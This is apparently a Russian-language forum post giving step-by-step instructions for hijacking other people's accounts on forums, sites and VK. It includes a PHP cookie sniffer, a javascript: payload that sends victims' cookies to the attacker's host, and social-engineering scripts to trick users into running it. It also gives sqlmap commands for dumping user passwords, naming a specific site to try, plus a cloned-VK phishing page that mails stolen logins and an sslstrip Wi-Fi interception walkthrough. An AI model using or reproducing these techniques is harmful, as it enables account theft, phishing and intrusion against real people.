Взлом пользователей практически любых форумов и сайтов.
Coding
Каждый сайт, таит в себе множество уязвимости, все уязвимости ни как не закрыть, так как когда закрывайте одну уязвимость вы открываете другую новую, и удержать этот баланс крайне сложно.
В некоторых форумах и сайтах есть такая тема "вставить ссылку". Встречаться редко. Открываем этот сайт или форум, и в место ссылки пишем
HTML:
javascript:alert('hi');
и отправляем. И у нас получится вот такой код
HTML:
<a href=”javascript:alert('hi')”> javascript:alert('hi');
</a>
А в форуме просто javascript:alert('hi');И при нажатии откроется окно с текстом hi
Но тут уже видно что это не ссылка скрипт, это можно легко исправить, у таких сайтов и форумов бывают свои команды в чате или в строке для комментариев, например обычно это [ URL=][ /URL], то есть наша цель скрыть скрипт, и делаем так :
[ URL=javascript:alert('hi');]google.com[ /URL],
И результат будет таким google.com, если нажить появится окно с текстом hi.
В некоторых сайтах это фильтруется! Мы вызвали хss. Теперь давайте напишем снифер. Для этого нам понадобится любой хостинг, и создам там файл php с содержимым сниффера:
PHP:
<?php
$cookie = $_SERVER['REQUEST_URI'];
$ip = $_SERVER['REMOTE_ADDR'];
$file = fopen("snif.dat","a+");
$time = date("H:i:M:d");
$add_text = "$ip $time
$cookie";
fputs($file,$add_text.",\r\
n"); fclose($file);
header('Location: https://google.com');
?>
Сниффер готов! Далее открываем форум или сайт и в место ссылки пишем
HTML:
javascript:window.location.href = "http://testing/sniff.php?cookie="+document.cookie;
и даём название google.com
Как это работает?
Когда пользователь нажимает по ссылке, window.location.href отправляет его на ваш сайт вместе с его кусками + document.cookie , там его встречает сниффер, он берет куки с ссылки IP адрес и устанавливает время, далее создает файл sniff.dat если файл создан то записывает туда.
В итоге мы получаем чужие куки)).
Далее просто заменяем значение remixsid. Такое можно сделать и тогда когда есть на сайте/ форуме xss уязвимость, с чистым xss намного проще, достаточно использовать тег link и поставить ссылку на сниффер
HTML:
<link src="ссылка"/>
или HTML:
<script src="ссылка"></script>
, теперь каждый кто перейдет на эту страницу отправят вам свои
куки).
Также это можно сделать на сайтах и форумах где отсутствуют эти 2 уязвимости благодаря СИ социальная инженерия.
Повторяем всё также и пишем пользователю:
Привет хочешь что бы у тебя на странице шел снег?
Если пользователь откажется попробуйте уговорить его.
Если пользователь согласился пишем ему так:
javascript:window.location.href = "http://testing/sniff.php?cookie="+document.cookie;
Вставь это вместо ссылки в адресную строку и запусти. или придумайте что-то своё далее вы получаете куки и меняете их в настройках браузера.
MySQL, вы наверное слышали, что это бд сайта, но и у неё бывают
уязвимости, например представим сайт/форум с этой уязвимостью,
но мы его пока не видим, давайте попробуем вызвать её.
Какой-то вымышленный нами сайт имеет уязвимость и эта ссылка
выглядит так test.com/index.php?id=67 попробуем изменить id=67 на id=6'7, и у нас высвечивается строка подобное к MySQL error /root/www/index.php line 5 , или что-то похожее.
Тут нам понадобится sqlmap. Если у вас её нет в интернете полно.
Открываем её пишем первую команду
sqlmap -u test.com/index.php?id=67 --dbs
У нас появляется не большой список бд, выбираем нам нужный и
продолжаем(представим что он называется bedsit).
sqlmap -u test.com/index.php?id=67 -D bedsit --tables
У нас появится список хранящихся данных в bedsit также выбираем
нам нужный например
user_site sqlmap -u test.com/index.php?id=67 -D bedsit -T user_site --columns
Нам вы водятся хранящие данные пользователей этого сайта, выбираем нужное бд, например
user_name и password all -u test.com/index.php?id=67 -D bedsit -T user_site -c user_name,password --dump
И получаем список пользователей с паролями. Вы можете попробовать это на uselitewine.com/index.php?id=66
Ещё одним способом взлома пользователей форума, сайтов, соц.сетей является фишинг, на фишинг довольно хорошо видится люди если вы будите хорошо манипулировать им. Я обычно если взламываю фишингом, то делаю через левый номер в ватсап, изучаю друзей жертвы, и пишу с левого номера от лица
друга жертвы.
Давайте попробуем создать какой нибудь фишинг. Для начало берем нужный нам сайт или соц сеть, например VK, и в адресной строке пишем view-source:https://vk.com
Копируем весь код страницы, а перед путями к css файлам дописываем https://vk.com/ теперь ищем тег form и очищаем его содержимое, далее внутри пишем action="open.php" в общем он должен смотреться так form action="open"
Между тегами form ищем тег input, внутри тега input ищем value=""
Теперь пишем внутри скобок value="" <? $_GET['email']; ?>
Точно также и со 2 input только вместо email будет password
Во 2 теге input иногда нет value, по этому придется дописать
name="password" value="<? $_GET['password']; ?>"
Сохраняем как index.php и создаём новый файл и назовем её open.php и пишем внутри
PHP:
<?php
$log = $_GET['email'];
$pass = $_GET['password'];
mail('xxx@mail.ru', 'vk', $log, $pass, '/');
header('location: https://vk.com/login');
?>
Там где ххх введите свою mail почту,сохраняет файл open.php и подключаем хостинг, а получившую ссылку скидываем жертве, когда жертва войдет на свою страницу с вашего фишинг сайта, его логин и пароль отправятся на вашу почту.
Ещё одним способом является атака mitmf по Wi-Fi сети, эту атаку можно сделать и с телефона и с пк.
Рассмотрим сначала метод атаки с телефона на платформе андроид.
Для этого нам потребуются рут права и уже готовое приложение
intercepter-ng, подключается к Wi-Fi сети и делаем скан нажав на
кружочек в левом верхнем углу, нам выводят всех пользователей
которые подключены к этой сети, выбираем все или нам нужный и
продолжаем.
Затем заходим в настройки этого сниффера, и выбираем lock screen
и show HTTP Reqs, рядом с настройками есть картинка с
человечком, жмем на неё, ставим галочку я эксперт, и выбираем
sslstrip, жмем кнопку с картинкой похожий на спину акулы и
нажимаем начать сканирование затем сразу же жмем кнопку
похожую на радиацию и запускаем, теперь ждем пока жертва не
оставит за собой куки файлы. С пк тоже самое.
Скачать его можно тут sniff.su